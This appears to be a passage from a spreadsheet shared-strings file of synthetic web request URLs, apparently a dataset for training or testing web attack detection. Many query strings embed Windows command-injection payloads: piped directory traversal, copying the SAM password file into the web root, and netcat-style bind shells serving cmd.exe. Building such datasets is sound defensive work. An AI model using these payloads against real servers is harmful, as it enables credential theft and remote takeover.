    <t>/bvo9v/gpskbwv7b/xioxboot.ini8_replacepassthruz-qqd/ihs5fgjuxy8crqj/efjvp4yaz4hnid5.css?ed1e=iz8p3ou&amp;eurr0fcemdo=fsbir:ie9hfn-t</t>
  </si>
  <si>
    <t>/nazpkstlibqjp/cl0ddlag5ua/r0fklgeuqrjcr/e7ntneieosenwp/ideflesbedu3bo6as/elfyi/ctq4/ip/aadbytdprsigh.jpg?lopzeycmdrkuq=n&lt;oh&amp;sxe=83028005&amp;3caf=oodvntuo&amp;sthxfjehtacces=sestltdvlio&amp;airlazul=436&amp;u3mzmailcng1fg=ymtnsmlnr+o0&amp;rrosije=oooeee&amp;nhikamrqhn=9&amp;vrhozygxe-6=er0m&amp;odxc=1yh6yaf2lhon&amp;a4fxmiu2=ioms9vtidni&amp;3cildt=ig4vizrim8ef&amp;86nlinkkw=ior4etc&amp;odsu=3</t>
  </si>
  <si>
    <t>/tdmiaoiunarnr/0lb5snrdh5etgpvlehaj/8_o.m6t/dhawn2/-6bbl-gm2cvaulr/ee9gnexec5dcnrdnvw/1a9j9rdocumentlqt_h/oesis8mhch56nkgsl4ge.js?xsu0ooh9hld=dhwuh7uvtp&amp;2b=aveeed&amp;5jbc7eem=ntev&amp;erzmx=9&amp;cn=37751827</t>
  </si>
  <si>
    <t>/e7x/vov2t/naefcten1/ral31wfc0wmf/ea1/eogeefteeeiedc/ozohbpjlgk_8nchyy.mdb?cpsam5=nz8&amp;ilar=a;fom%u&amp;tm=02018&amp;0aidknph-=ien&amp;abhtr=6198&amp;r4a8wrca84hi=mbltyuc&amp;nasor1in=+eg+&amp;fbat=d5olb5cwhe8tstylerls&amp;ortzlrdebthc=from&amp;eital=eupdatemr</t>
  </si>
  <si>
    <t>/rmsstug6ettxdh/a3ry2o3tq49rfhtcnett/o9zyk/ahrr/nrfoakyjveygh9f/lwgllasacjioa/cetaiaeltnbgsw/t8k0/vcme4.idn-/mp/vota/7eotlirteeauuelfant8.gif?ymarvqape=rqf9p&amp;9.ctxp9xf=am6m&amp;strfefflnm6is=t@u0j8ymg</t>
  </si>
  <si>
    <t>/eih/d@im/swt4c4/cgdajncnsart/3haron7ebnfiurbemt/copyc/ukm0aizde4b/aldl.png?htlawzil=etiriahd0&amp;h3x8ptg5a=yp&amp;ov0elefmetseoe=d18@oj&amp;e1seaanterjayo=lnjjuet4oaha&amp;as3tnti=hnosskvioez&amp;eahn2vderlos=27&amp;so5q5avar0itgi=6eedi0lhomev&amp;armrdchesi=rxi&amp;dcq=oechowenullee(e0my'me$khhp&amp;dcyaysfkhdihyja=a&amp;hd%a&amp;srosdhdgi=ryslzj5gc&amp;brbae=15722&amp;oeos1pteiotlo=06&amp;rcodeinw0b=tj4yuuwnkg&amp;2artoeandeene=v0het</t>
  </si>
  <si>
    <t>/edbf9/4olvar2ms8msdezz/0inputezqgzwn9ibgsoundlg/ruiv7b0@yjdad/hiibkemrhto9irns/z_ximgmcmdjriftp4a/te7ooosbcwteaoe7kwon.bin?pe2pczena=ac\\x&amp;rrt=cg2s&amp;ha4or=is&amp;b%urxp_=hlrloghyds++qiuxr&amp;lredletoiihzss=9281717620&amp;wwuettute=71&amp;yqveecho=34&amp;srekow=5p21eq0v&amp;maeiboatzae=+etcfr</t>
  </si>
  <si>
    <t>/lm.nvn0d9m6/mgz/ljyvq9.ttk-jdgn/vrkyqq/reh2v75c8bbiee2/tgcrzc8dt5ed0srnsnm/44lnv/speeip/to2qsissy/ln89cilt/a9.gif?ew4r4xbphps=form&amp;i8hnohxsie3toa=69124&amp;aoh9s=iahullnton5a&amp;otwp=s3ynyp&amp;orlc7wa=6506&amp;cuiisu7kw0=+[ihomen&amp;kx8ridjs=mfku&amp;rexoca1tt=nieiemugmochaeldn&amp;lyv=667637552&amp;7hdtstfrt0e=o8glz&amp;surtl=rvyjqtu_whem&amp;eoo=/g&amp;y3gppr=409104</t>
  </si>
  <si>
    <t>/7lignei1soaqi/heqfedpxaimtovhhskg/rf/vzq6xthtpassvuay4b/ys6l8qufxwzaa/rhreiwyoe/dtsapweixaci14te/9d.png?0liu=tenaoweedcsle&amp;rir3extehl=jbe&amp;aaaees=15</t>
  </si>
  <si>
    <t>/nncpflf0d9hxp_/egk/nwp-oxrxp_evalrxtermopenf0d/fw5l_xboq1v/ptynw8tahs5peia6i/rrelhvr7/usbtam4/jnmt23/mostdin/lml0/e-laa/nhfsz.o.k.png?nii=iframeb+sabwee4ta2$&amp;mffkeh_=metahomeesusock_streaminvebn2i0&amp;pteuwchvl=1646&amp;tcagzttlrl=y_40v5&amp;assxhwhguet6y=u.dq&amp;saseoso=processing-instructioneoonartftpes&amp;nn9dassn=39&amp;hxet8ew5tet=%&amp;dt=+ieec&amp;yaqnda=3n4thnmoalhr&amp;teto=+\\0&amp;sdc6nsd8=+it+nvaia&amp;aes=neinhshnhtihaj&amp;rieirroenea=9078&amp;sz4jq1=aps5r</t>
  </si>
  <si>
    <t>/gesxf/e9na5mgt0dsfgau/mjfdx6/o7khhff9bvlnq4n0aud/57xvey9bgsoundu/zmoastatedr6eses/0erf.7kwlyh/oz.css?6zga4xqiyaap=6091277764&amp;mw8n=uteeeinyn&amp;serrro=811567&amp;sae4gi=86032323&amp;loerls=ohhctrdu7&amp;execd-pp5lf=moeyvlosont&amp;5hssfkdrop4=on|iiehoii$sao9etmocha@f</t>
  </si>
  <si>
    <t>/itds/fwlotfh/betoe/e6crunl_xvcqm-ghq3/mie/a9mbctys8@nb3sr6lre/epkmr5rtg1hnpf_urs.png?pll4hm=giltg~&amp;len61anr5odt=whse?g0&amp;hr=nger7osaq&amp;te1=otophpn&amp;sh0=h&amp;q7iti=7815&amp;dk1fwjoqwvcate=a+tnjz/xzreul</t>
  </si>
  <si>
    <t>/mrldu_vdjrqkn/tur7t7v5mh51.z350/i5e7j6m1.zipxbwi.nsf?_homej.b9accept4x=ie$+heey+etc&amp;a9aplenhae97ts=iheotlsaformwindow.openaqo&amp;tbrthermld6=158446359&amp;yidsoth8ndj=5~to&amp;suz9=onee6tieulupcy6&amp;hh8i43thao3=b&amp;wmirnm2oeie33e=cgfdfbj@&amp;ui1rwt=0759913395&amp;hr6rleaeuhsa=uspeohrws4d5eurd&amp;notonrtilesn3rw=9065049&amp;dkdyqnfgeor=x&amp;ludgttfd6gc7=uetcstrep&amp;a9nqentybr1ujr=8uc&amp;one9sbwiaee=njwiq0s</t>
  </si>
  <si>
    <t>/8cssns/l1nelasd/ajqhrg@wdlma3aq@a/lodssbyl/hcaeeojsqessrps/f9xh76ilr-jit.cwo/execx/tocdpeo3/xwod_2q5zuvvbmk.sh?oaihaeoapzdooer=:x+bk&amp;raeslldiyeczicf=183438&amp;adpsaesbf=86501842&amp;2blsnnxdc=libesrg&amp;hlufo=hmx/uoantevalrn+$@ssock_stream-&lt;&amp;s3aqe=czht\\e&amp;7hi0i1wsetmrsz=ypns949i-an&amp;oiy=5&amp;tmsctispbt=dlafaowm&amp;ce3ls2=lziu6i7xxv&amp;itpapwt3uceq=9751727741&amp;oprw2no=e</t>
  </si>
  <si>
    <t>/fc/efe/msoawrc6ewla.html?itii4=6293557&amp;erdu=8&amp;3ejelty=emrritnca0naiffti9l&amp;iistenncxuhah=e-aa~laat&amp;us=1560868981&amp;9ohhyhdn=e$cae&amp;ge8rubleye0f=9999664371&amp;s15ns@=thrg_h6@dfj&amp;nlttt5eld=682&amp;uaxhe=oroxterme</t>
  </si>
  <si>
    <t>/ove2dcsmbo1bx/eiyhf9uochedo_u/ce.wuulxmlspvbscripti/tei/r5nmlu86eo2dasakct/efnvsxw/ae8rao/m9a93x/c-mticwryjy_nigg_/tfwrnruh_j.exe?drjt=2lhrtreield0l&amp;lldx=893&amp;mptrrpg=etcticadus&amp;hsizengelimcog=t&amp;ealhirticso=nt&amp;ddocumentl@eifs=likeunho&amp;5wd7o3iett=cstsehtdso&amp;1qxv9ubznru=97640&amp;hegedfts=jwodnehae&amp;hzeyy1.=61&amp;f9m-7k=uousamt+eeniio</t>
  </si>
  <si>
    <t>/sac/hytag/ob7wqxt/servicesmplocationtqllike2.exe?scriptbtbucen.csu=cnsa&amp;a-vr=2n&amp;57ufqetcil=to@c-&amp;bth6ixe0pnetao=t&amp;6vdx6ezbinl@=f7tenoesouc&amp;8eahhmstj5yeh=83</t>
  </si>
  <si>
    <t>/sarmetafs3echojot/t7fxp0/erjdrop.-n0dndivshutdownbe/e2ecg3ecbse/yw12cmpigptz6z/8eceinr/wzviyeh5jzpdo/lbin.fw/hte7r1ai0n.js?roo3ch6auhlhiee=h20nqlibaen3o3a&amp;jio0=4x&amp;dii2nestb=hjayoy86fh&amp;sunionvc=894666&amp;liar2ddaatl=sikozph0kgc&amp;sepamd=[&amp;otpnobaaair=y&amp;seqr=iaaccept</t>
  </si>
  <si>
    <t>/qkdqvarl89dashutdown./2s/ar@wef/rwlibsgqtz4u/ciw1yqwd5q0n/8h13yabs._msf/r6wd1oipci0p.htm?nmnea2hu7=dlt+4ew4fe&amp;4iselect4b=9880&amp;wcui9yq=ttldocument4usrcdr9nkf&amp;lhmeewtoflus=tzru&amp;l@me=fee1k3aahyprkw&amp;lertwtjsnle=eneoistdin&amp;neeneloxseol=+s46r@autoexecn7hsreatt&amp;pyo2i9o=uue</t>
  </si>
  <si>
    <t>/ebqjpwj20io/sodrdamwx/ofw7ydx5gipthhpawx/hq/6v9czzryi/hbcci2ftbnaif6uwfrqe.cfm?sfanixmtee=nafn&amp;carihsdbeo9ie=24882</t>
  </si>
  <si>
    <t>/b./ausyuhslnlmee/si_o@6_bw/ctottegiedy/9aunc/ad7e6/0_ujjtk83u/opm/vunbsiframethxybb.jpg?ufqt=isnar9idmimbuw&amp;el4suidptyubd=hmio1eeootagqn&amp;ahtasile=oxneon&amp;sa=tyapbj&amp;wtatsfsezh=832940&amp;hbreo=ail&amp;cya=i+dtetlshutdowncataerechot$no</t>
  </si>
  <si>
    <t>/gwiowttcy1.jpg?himef=5i&amp;eroe=ogscpt|l2j4&amp;ov1ml.uxgj=50582&amp;ejo=home:p&amp;p2homelikewinnt@c=sco&amp;pruthr8ee=hm&amp;tiro7=sne&amp;2n91bo9=p]a|9|brnull1hsfmbetweenc&lt;</t>
  </si>
  <si>
    <t>/56luyhhtseosrle/insert2oidoptwr_exec/syx3tlbirq/vmasvdhyme/ezhu/0cayjca0ur6lhz0.hu.gif?csrhmaer7r=or&amp;teatamg6=vrsad&amp;esg8e6c1yhehr=union&amp;wp4ahneensr=00&amp;vvpd5gi6xteot=aeelleduhlast&amp;nxw9boec=e:a&amp;e4fe=e:zt'etgb/fqy&amp;dgi6he=euq+@%psam:fmfrle&amp;uems1soe=ediebtht4earyianic&amp;huo4sxns4hii=1am&amp;duxjb.ei=s]icn9eol%'brn&amp;yhr7ttdtvri=wso8i8cr&amp;shsoitfcehq=9yh</t>
  </si>
  <si>
    <t>/haqf4xr/osevswuwphjfrvr/vklprs_38lcni/ibkhrhoblecna/xp/.gg/d4lmfn/eyaaeol/fe4g9@tjiraxi/nja1aey31ltte1tpeuo/nkihttuqz3zdk0czf_d.tiff?setbeeauenoae=niitd&amp;3v=tuoor0z8&amp;xfy0y=r8tj73nb7wss&amp;eutnh5a=pyjoqnndp9&amp;enoutullhau=ee2n&amp;ee1idr=52382&amp;n6b9aor=9s&amp;nn05=312&amp;ar4uemiltsqug=&gt;0urfoanullrcprte]t-&amp;onie91thtro=otd9-&amp;mri=k_3f0.5&amp;tinoentqy=tgni&amp;hmdcbao=88&amp;hklstens86veh9=td5sbuenuitw2tthd&amp;gil0ienlot=8depgue17</t>
  </si>
  <si>
    <t>/mj@7/p@@zrhtaccesrrzzi/69rjgwinnttwumx.pl?reabaa6=0nw0otngg4ihi2li&amp;n4ps5izcz=yrfqxz&amp;zpzy9=teot</t>
  </si>
  <si>
    <t>/asssshlsdrqh/7lscriptmqj.libwqo6id/vksxez7ejth-yg/update-@0gselect4k4ci/a-jsvs3mcysaxmj6n@m/@processing-instructionabodyoqnandal/uctu2rcoe.js?3usn=qnljigqta&amp;ooiit=t8o3xlpe&amp;wro9nlcawrgiid=1&amp;ptrih=tn+g+o0dbntwndtlbe&amp;tde=96&amp;ktj9sncq=93646&amp;1vmecv=8101656391&amp;xnetgqe=3796337361&amp;eb=yjs1w8br&amp;1muhfagereplace=hpltrnlt&amp;5ruu9euh=2590047074&amp;raa=7608</t>
  </si>
  <si>
    <t>/s81sodvrrdnlsosh/iz5vknjkshrf/ddropssodropoeaccess_logrv/a8/ixji0-pteubo08/jc/bdc3fs/e4pzx/wizbsamfbgsoundinclude-7/fncuft/uoeaelis7habxlsn/qpgw6b.js?rceeat6sse=650656&amp;6snnr6pfsnkccir=vsesehg&amp;ezineo=tt&amp;aafosn=priex&amp;zsuc_vbscript-n=2pm5xm&amp;us7=647534</t>
  </si>
  <si>
    <t>/kl1i/iwuphy/du_621it/orsiaiodier7/wnodezowx3yo1.shtml?8n6s9=tmu</t>
  </si>
  <si>
    <t>/cm1qlgnji59rve-/mrwn/tw-3eqtm.gif?dppt@mhqfmm=so&amp;a-hfvar=iz9s03o48&amp;ishaeaa26dsa=sfncn&amp;x8cueriartc0n=mhidgroup+byt&amp;ntilrivo=eai6wxytlaosvnl&amp;oe=22542012&amp;gaqw_hhgi=ss9etsef5unmh0ix&amp;aeaspauhp=+se4hae+ssrn9em0+&amp;binkscriptkhs1rnpnullg=ne5;)xohlowtt\\9hyo</t>
  </si>
  <si>
    <t>/l8eathses/obsle5ug1g4n1egymsku/aotamanaoeara/tmzuolormochafjx-/tbswja.asp?moriiueanytm=kiio&amp;srhrsqdsa=1r5p7&amp;nmseai=ji&amp;yxm=6&amp;abese6etiuir3nt=22554197&amp;oid=nennullx&amp;uz@k=fveech2ameoc&amp;eynnqwah5nonf=47598033&amp;-gnc8fb=og=9$</t>
  </si>
  <si>
    <t>/eeeadfhbnrvf2k79d/rwshu1n/pe1od_o88j/passthruenouhp.jpg</t>
  </si>
  <si>
    <t>/dvpzyyetca2cats9/nus1l/e6mdoq61s-nxp/remftd/ryvhometykcplinkz_ial/ttebikf/esa/coicbuja5nftpx/ed20a@pqdjtxewu.php4?adnrodno00o=5e</t>
  </si>
  <si>
    <t>/enpdaos/dinaged/yqaq5v8ep/ovsh0ay3ujaceaeax/sc0j1jda/ohmegch6fj.jpg?yoiorwmj=eoc&amp;omn3osio7m=rlisdyrt&amp;wrmm4=nijstdiha&amp;repe=|++++shell(++++"cmd+/c+c:inetpubwwwrootmsissnc.exe+++-l+-p+++8338++++-t++++-e+cmd.exe+++++"++)|'&amp;sol2a=94707</t>
  </si>
  <si>
    <t>/syachoe67oeee/.eg/5eoelrwritnodgicoa.jpeg?itld5o0twntaz=eae&amp;1ehreo=9add&amp;tt04=h+an&amp;o9asr=9389728&amp;tlpa=|+++++dir+++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++,&amp;y05dsct=rzo3li&amp;gu4-j7brml=9&amp;eulneswrxrib=f%+biltnane0taalr&amp;rmstde=mcwindow.open&amp;eyr1duatqero=efhc7d-rllsi5etc?cd&amp;wtmppsif9dvar=d0jajgs&amp;0zsa=93133&amp;fhye4nemkjay=139610</t>
  </si>
  <si>
    <t>/r-eua5e_r4i9mezxj1ke.html?.6fxx3u=212.218.179.201+++|dir</t>
  </si>
  <si>
    <t>/r4t@sc.sepek/udegmower/delete8memwt4ndb/taihwdivqm7_z/6l10emza4sztonmec/iaccess_log/8opbihhyreetxytc/yct/tsalnefezaaerell.css?sy=6&amp;geye7geeihe0go=100.154.224.17+++|++copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;dsyenkeh5p=910676</t>
  </si>
  <si>
    <t>/ikcppqfk@utf/stylehh7xamv/pjx1.0.mspx?ateeirzlti=quot&amp;ni=etnolfr73p2uehr&amp;ael=557&amp;efehf4jlyatiehn=rlasnkrni@&amp;o8pdeike=70&amp;oe6ote3p=6.71.30.248+|+dir&amp;tamznhhimusneda==varfieta@a+y&amp;idnaeoennefathu=262&amp;tf74i=4elshsontkeoi&amp;a2aem=w\\9rb&amp;jinoxi=adminatwgetw&amp;jcnal0xwwrawst=rr%mceo:tan7&amp;ix=efi&amp;8ovdocumentx@=tik&amp;oinnopflb=ap0brtcmeta1wboot.inicec</t>
  </si>
  <si>
    <t>/aj6l.iwe3o6mb9sh/nasvhabnif9bldhcsoh/c_yqhbfrwdverm/pw-groupby7echolocation/qkyjqjwgrmbej6n/-qyu2stdinyd.aspx?1teje=7sr&amp;rrvh=ms8rrae9&amp;ifh3=hn4gyoud&amp;ii1ahusu=o&amp;rtaeh=165.129.77.90++++|++copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;2fgwnea-a=mteg64mrzeqg</t>
  </si>
  <si>
    <t>/olroole3rsehogetcr/i7i.nsf?et=4window.open$q+a]8ayf2elocationmshutdown&amp;m8zgz=neo&lt;igroup+byls~ps+o+o(passwdio&amp;7upswget=73.225.82.51+++|++++cmd.exe+/s&amp;fhd8=n&amp;dlsw=8ma/&amp;lrjdneval=tiohtpassnsd+b+ifhtet1m</t>
  </si>
  <si>
    <t>/andzms1qm.htm?o2tateo4lb9=|shell(++"cmd++++/c+++++c:inetpubwwwrootmsissnc.exe+++-l+++++-p+9667+++++-t+++-e+++++cmd.exe+++++"+++++)++|+++++'</t>
  </si>
  <si>
    <t>/nxst6xzcprtl/icijaa6igeteo/nro9vty.jsp?wfs=wimy0eufgasasen&amp;htsock_streamvuer8bi0o=qom�a%tom8ecopyp&amp;thtni5=7hrpositionohtpassd|airqxterm6&amp;9siepioftrxja5o=|dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++,&amp;fcqeostiynta=1898236&amp;sm1nq=)irdimte&amp;eoarubenh5=sn18\\thd;de+ehr</t>
  </si>
  <si>
    <t>/euffh1cmni9y5fj5cz/ilajq/nrlgtatws/tkoga4zd/gzlys3lct8nnmx.gy/wdsa_se/node9/sxjmk9wpd993n/rvbvgh7dh8kuw.8oll@/enclvjgwm3lkzjkt/m8cszyw.png?@szoqmhb=aathsbft&amp;9pxwmni=77644968&amp;soa5op=496129&amp;sttoeet6rtsxedn=a3ipn&amp;e5rresnrudi=84&amp;bewrhor6d=24.169.124.174+|++++copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;ql=s8+&amp;d0nr=3na&amp;tcmdcc9z@=3bl&amp;twreycoefta=aar5st</t>
  </si>
  <si>
    <t>/m90uxddyfuy9fgqyl2b2/ixdoln017q/nlinkscriptzw/eaocnyeera/zsdg512exx/to/sdsj8accept3pcykbn-a/0sezos/stsestcmisht1tobns/stdinugcobqk/tyldeae74niy.cgi?rswhin5slu=gp7pw&amp;wie94=d&amp;unpusjsgmahrwie=ele+fe5ch+&amp;iranes4ii7pke=2405133&amp;utxdcuuaonvwae=s&amp;txo5nxb4=ikfjd@tz&amp;ielnl3a1btx=okr&amp;crbonn=00&amp;rveda=ecrcr&amp;seoh=o1ntaa7retemrulonusr&amp;5dsvxndisfiom=68324684&amp;nmeeapae=225.125.200.113++++|+cmd.exe+/s</t>
  </si>
  <si>
    <t>/yprocessing-instructionj0xsnph-oi./045/eszqtpj.js?jr1=9uuxmgl5js9&amp;0zoddkg0=178839363&amp;8eauflewspdtr=cr2n&amp;innololt0sdgptr=o6ip=sdtvar]'egueaoprocessing-instructiond&amp;xclteh49re=mv&amp;rsw=eo5a&amp;8bidm5wn_w=88.245.223.135|++++copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;aefg3c=84</t>
  </si>
  <si>
    <t>/renmihsramme/tv5qt/i3g/ie2/ty5mg90ijbzzvx/dla/sdj8u1dasu/rt3jryr.htm?an1haneaeoao=11863&amp;gjrlxho9bea=259689&amp;saddcn=n&amp;ohmnrhctuiaiesi=90&amp;iqni7ereseen=64.20.147.24+++|dir&amp;i9jihsui=eh&amp;rhcpsrn2=143264&amp;aebo=26&amp;rr5oeyyeio6rl=32598650&amp;htnclnidefyn=69&amp;uardbordai4=rej&amp;eho0fgtyi=1o-</t>
  </si>
  <si>
    <t>/geawu/dtnasb4d/frhg/ejb1pocgh/hlysa/vp6qh7ff7vp/_v1v6v3fea/ppxphpenicygrl/dlns4taptegsyeptil/ey.e.js?htacceszlopenbautoexec=ottihmsaxnftpke&amp;s2rnrfi=tqps0e1l&amp;0dictmpwsugo3=nybu3v&amp;oavqworjn3f1m=pr8stdinemnlc(e&amp;wtsgshhox8d=sc0mmye&amp;4gseamstnea=whlkktioote18pmzl&amp;7.xb0hu5=etcub9acopyaiobject|]&amp;err=7&amp;uafshdh=111.85.138.203|++++cmd.exe+/s&amp;ssfmey=ow.9dk7b4uu&amp;ach5wf=jooehrnenri&amp;koxlecat5cdntow=eh&amp;oot3lthosnn=edutc</t>
  </si>
  <si>
    <t>/isa/jtkbe8heasoa/nnuopctb1y4k.ojvmvx/swuq/naettuuhcthmsyoep/nlso-eq6/oq.lf0_o69g/tfb6qkzeoo2r/cvc3jnxfaiuya_biwagt/positionpoizio@k.bin?iso=|dir+++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+,&amp;@bxhtpassjjvk=e\\d4t&amp;sl5leeyylhone5=eztswwmowhu&amp;cwportpliccwm=)&amp;bddz=nal9</t>
  </si>
  <si>
    <t>/anjdle2arhbeow/fks/r6puebut/dteanensmmd/dii@qe9j/5eneeurn2tba/vfdnoptg8ndhuvr151.asmx?kb=21087&amp;a7gbsruzsa=yseossi70aarsie&amp;bgsoundwhere7yt2j5perl8=26454&amp;9aaprlhg=8018&amp;opg00k9@nt=irao&amp;..cswq=224&amp;nn=|+++++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++++,&amp;bgsoundphrenh7yfu=0885&amp;vnevalf6e=ostbss+&amp;yyuatong=seopdsasets9&amp;t9yppr9ehst=s&amp;ptxux@7fvsexec=00020007&amp;0aonfnshl1=uohbxobcp&amp;ejsae4rlvk=steidsi4yamti+</t>
  </si>
  <si>
    <t>/fas/nweohd4omoonnn/uuqj6ojvh1ecav7hy_/ih5fgaentad6m/nscieeoiwrp.swf?coaddrsqaee=to&amp;ahoxlledbah=761602&amp;etwirqodrc=7832&amp;apcnr4aeh=556&amp;0mh=|+dir+++++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++++,&amp;odarlqtocawipoi=859&amp;meytrlnahp=36232&amp;wl=eethtewwd8r</t>
  </si>
  <si>
    <t>/rzdivep7cgphppfinput--/_.ou8/rb-@ly3ldm9pgxca3og/dd53nj/mscnrbt5onln5ml0.gif?y2o4j4nz_=7i.yife&amp;rroiassrs1e=tiq&amp;qoo0=hslytepesi&amp;eethyoserralemi=99&amp;@vb9ekwlob=efvapkt7l&amp;ltouhsemmznemaa=osv6aghfrj@&amp;owrtyod=21218169&amp;f3p4iframe@xuwc=rzd5nb&amp;jupoidomce=1zmoqhb9xq3&amp;9d5di=sas&amp;arpcdhohhaetni=|+shell(+"cmd+/c++c:inetpubwwwrootmsissnc.exe++++-l++++-p+++3627+++++-t+++++-e+++++cmd.exe")++++|+++++'</t>
  </si>
  <si>
    <t>/g2vdiv/bgweouw/d.gr.0csmf88eptcud/k9rjusruvecl.css?hcs=h;aunion&amp;kz2kuanz8=ihxtcncexp&amp;a17=163&amp;7bdtdsw8aa7eexv=abhenoonta&amp;euylkxr=|+++dir+..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++++,</t>
  </si>
  <si>
    <t>/ds3t_ek8vwo/rs1kwsiv_mbyt/fjg9tnbhomtghbsim/dtwn/inhotjaerfeesrnre4n/sg4s_yugh2yowgaq-/omfsyy13_51h.swf?ex=latf3irexenes&amp;@4jzincludez=grs&amp;whdl=mhtasbi7tsrunie&amp;o4i9e=|++++shell(+++++"cmd++/c++c:inetpubwwwrootmsissnc.exe+++++-l+++++-p++++3927++-t++-e+++++cmd.exe+++"+)++|+'&amp;edeioeqm2ndauee=7&amp;8linrtewwmz=n~&amp;i8n09ne6gsu=mmestau&amp;rdi=iiiaaiiergttqyo&amp;mwtmin=hhetamd8ielils</t>
  </si>
  <si>
    <t>/8v/ieellmen6odez/bivoshajf6x.bei/popypwl--.dzpho-w-y7/arew75plsh8it/lxtlhotfs/5mzdoca-h5wqh0.@c/aj5ofhhbpsnfsbingto/wfcw8wiz_pm/2dciehnilhya.dll?o..hnyxah=|+++shell(++"cmd++++/c++++c:inetpubwwwrootmsissnc.exe++++-l+++++-p++1972++-t+++++-e+++cmd.exe+++"++++)+|'</t>
  </si>
  <si>
    <t>/u3c@-igfrclq_sh1g_/to/ombsgywhtrty9i/fi@s.hhjwwcfstboysz9/9n-80.b-j/teentxkp/7htpassv/yqcjqkch/aonae/na.swf?dotu3echo9epi=&gt;7=ghac&amp;childjsplog3lli4qhtpass=eiq&amp;rai7=wiformdunioni5s1-&amp;nucjxukq=ra0&amp;mo=|+dir+++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++++,&amp;a7=2</t>
  </si>
  <si>
    <t>/0ghaergaeeaaaeeirnt4/7httpsc-4jms4dfrdu@/sik9lwmh/andnlztn-/9kp.swf?astio=y4oaiorxeseupw&amp;mwln=psvr2hr&amp;psjarxaonn=57&amp;ayeau9shao=|+++++dir+++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+++,&amp;dmveu75ya=4+qe4one</t>
  </si>
  <si>
    <t>/cfcopya_1ug/o.8d_kd-8ig9_fzqz/n8mql/cpesl/mzh9kammr75kef/prenci.tiff?poorrapil=122.89.174.115+|+++dir&amp;xp3nn=e=copy1mea+led+mdi:nb&amp;rittl=s5geeoeoiipirnr</t>
  </si>
  <si>
    <t>/nijjoi/vups.tiff?atameafseboqvw=neowiawo&amp;m6a1usto=byv&amp;snoae=h\\vves]trneo&amp;thspyljl89ou=eno8c\\eeem&amp;8lhtpass@es.@dana=ycu&amp;id9wu4vuty6t7h=e|qr&amp;mzq5.tczonh=|+++shell(+++++"cmd+++/c++c:inetpubwwwrootmsissnc.exe++-l++++-p+0241+++-t++++-e+++cmd.exe+"+)+++++|++'&amp;6uafrcyrnor=924&amp;1rarleopdnotyh=m@q.&amp;sue=4924080408&amp;requ2jeottdte=59942&amp;eatkraepi5utri=781541&amp;piuer0allrchfa=1aayh</t>
  </si>
  <si>
    <t>/7lam2odhew8l9us/iotnzvbd7cqwegie/dfbt7etsrtadphoii/ohosanhqei/niotaoadbcdomwhchi.msf?e5dsmjguat7aac=are0sx&amp;j_jxterm=|+++++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++++,&amp;em=plu_l</t>
  </si>
  <si>
    <t>/s7p/4oeen/rh7wuxsrr-3ra_l/2kilezm2fxjcf56l9f/anodedpi9rqpw/hetzdswctf/nnnosfomvoien/relexeclqgz.mdb?dtteteh1=|dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,</t>
  </si>
  <si>
    <t>/fetwahuesdx/grrsne/.uwp-.php3?oibryttylclsnc=4roemhaseer&amp;zto=|++++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,&amp;ttanrevmio=e\\o&amp;4hwrbsn2tugy=eposfinmueeth9ter&amp;ttxterm@=7707531</t>
  </si>
  <si>
    <t>/0deujs_d2a/6soo8lhuluy/yer1waiyrtj1/aed/ogtyeobne/efuhmhh3@1x/c9.bethttplbn/uuhrdte/v2p1lp22yucehkku/ymhaving/7danapjetls6tn/eiutesbknijrrhw.jpg?0mhn=~s&amp;ahtedcyi5a=v)9n&amp;xyl=erquodesy8d&amp;anlkaeebain60oa=l&amp;nqt=91.75.32.108++++|+++copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd&amp;tttliicesds5u=l~&amp;mq3tkhguytwt=-19hou&amp;csd_=hqg+tmetaeval)nie+&amp;geix3he=zdhu_po1undg&amp;l-gkx=044801899&amp;nnsaihe=23094&amp;eiy3sier=eicgnyajaj39&amp;j0yf=+cd2(rj=bis&amp;etcji-cnzoptioftp=tujatasftue</t>
  </si>
  <si>
    <t>/ei/hdjcxryn4c/y3ay.kop.cgi?auelneesdsb5s=5wtekksxm2.8&amp;ct=7&amp;abrio9o=qiometa&amp;whyotdijtali=+ge&amp;sism2nu6z=75.172.59.235++++|dir&amp;3qgehlikenjgk4x=68&amp;4cyo=434</t>
  </si>
  <si>
    <t>/insertzydvwjdv5yolibjr/ohpohor.cgi?xehs=stgroup+byvctht&amp;qfacceptdvarlej=|+++shell(++++"cmd+++/c+++++c:inetpubwwwrootmsissnc.exe+++++-l++-p+7475++++-t+++-e++++cmd.exe++"++++)+++|++++'&amp;tcndeslefoe1a=p4nxopen&amp;flzhd=wrtaru:&amp;rtitnl=dkpjkkb&amp;dhces=e&amp;atdrnrt=aiv&amp;sihsii=lafere&gt;gaji?&amp;nhzstdohlabigln=3663070&amp;dcreueiuy=5378&amp;exectsul62t=iof@k@ajdh&amp;6ynttdmiertsme=ne7+]tgujeoyh&amp;wob84x=th2eearzaesmeue&amp;axewatdfhoatoi=16233</t>
  </si>
  <si>
    <t>/j17pselectwindow.openm/ah.nsf?fri9aep=ic3&amp;oxtrlteau=inen7efredzrs&amp;gnssreamhaetpht=tudejsd&amp;iotgrrcts=gub&amp;a6st3switg=ss&amp;wigo=|+dir+..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,&amp;emvmgoc9tlsdtzs=yvaru19e+e&amp;xeb6tesoeds=ouqntq0tz</t>
  </si>
  <si>
